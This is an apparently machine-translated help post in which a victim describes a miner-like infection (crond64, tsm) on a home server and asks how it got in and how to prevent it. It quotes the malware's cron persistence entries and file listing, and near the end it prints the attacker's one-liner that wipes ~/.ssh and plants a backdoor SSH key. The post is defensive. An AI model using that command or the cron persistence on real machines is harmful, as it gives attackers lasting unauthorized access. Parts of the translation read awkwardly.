最近、ホームサーバーが非常に遅くなることに気付きました。すべてのリソースは、2つのプロセスによって食い尽くされた:crond64
とtsm
。私は彼らを繰り返し殺しましたが、彼らは何度も現れ続けました。
同時に、私のISPは私のIPアドレスからの不正行為について私に通知していました。
==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]
私はでの傾けたこの私がウイルスに感染している可能性があることをウェブサイト。Sophos AVを実行してハードドライブ全体をスキャンしたところ、実際にでウイルスが見つかりました/tmp/.mountfs/.rsync
。だから私はフォルダ全体を削除し、これがそれだと思った。しかし、その後も続きました。次に、次のようなユーザーcronファイル/var/spool/cron/crontabs/kodi
(メディアサーバーkodiのユーザーを使用してウイルスが実行されていた)をチェックインしました。
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb 3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1
ウイルスは時々別のディレクトリから自分自身を再アクティブ化するようです。そのディレクトリの内容は次のとおりです。
>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d /home/kodi/.ttp/dir2.dir
/home/kodi/.ttp/a:
a bash.pid config.txt crond32 crond64 cronda crondb dir.dir pools.txt run stop upd
/home/kodi/.ttp/b:
a dir.dir rsync run stop sync
/home/kodi/.ttp/c:
aptitude dir.dir go ip lib n p run slow start stop tsm tsm32 tsm64 v watchdog
これらのファイルとcrontabのエントリをすべて削除し、これで問題が解決することを願っています。しかし、私はこれがどんなウイルスで、どのようにそれを捕まえたのか(Kodiに接続されているかもしれない)、それを防ぐためにできることに興味があります。幸いなことに、それは限られた権限を持つユーザーからのみ実行されていましたが、それでも対処するのは面倒でした。
編集
私はこのウイルスの残りをすべて削除したようですが(tmpフォルダ全体も削除しました)、ウイルスは戻ってきました。にエントリがあることに気付きました~/.ssh/authorized_hosts
。これは、ウイルスを繰り返し再移植する方法を説明しています。エントリを削除し、そのユーザーのログインを無効にし、パスワードログイン(パスキーのみ)を無効にし、非標準ポートを使用します。
また、おそらく何らかのボットによって、ランダムなユーザー名でサーバーにログイン試行が繰り返されることにも気付きました(ログは、ISPから送信されたIPから起動されたものと驚くほど似ていました)。そもそもこれが私のコンピューターが感染した理由だと思います。
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
。cp /etc/skel/.bashrc /home/mycompromiseduser/
削除するだけでした。